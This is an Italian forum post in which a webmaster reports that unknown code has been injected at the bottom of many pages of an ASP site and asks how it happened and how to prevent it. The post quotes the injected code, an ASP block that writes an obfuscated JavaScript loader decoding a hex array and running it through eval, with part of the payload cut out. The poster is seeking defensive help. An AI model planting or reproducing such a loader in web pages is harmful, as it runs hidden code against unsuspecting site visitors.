Salve a tutti,

da poco è capitato che nelle pagine di un sito sviluppato in ASP sia stato inserito (non capisco come) del codice "intruso".

Il codice compare in fondo a numerose pagine del sito come se si fosse propagato (navigando anche le sottocartelle).

Riporto il codice in fondo alla pagina (ho eliminato parte dei numeri esadecimali per brevità)

Da cosa può dipendere e come può essere evitato? Qualcuno ha sperimentato casi analoghi?

Help!




codice:
                                                                                                                                                                                                                                                          <%
fg09 = “                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                          sp=\"split\";w=window;aq=\"0\"+\"x\";ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,70,5b,64,65,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d.......,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1\"[sp](\",\");}w=f;s=[];for(i=2-2;-i+1337!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}za=e;za(s)}</script>";
Response.Write(fg09);
%>
<%=fg09%>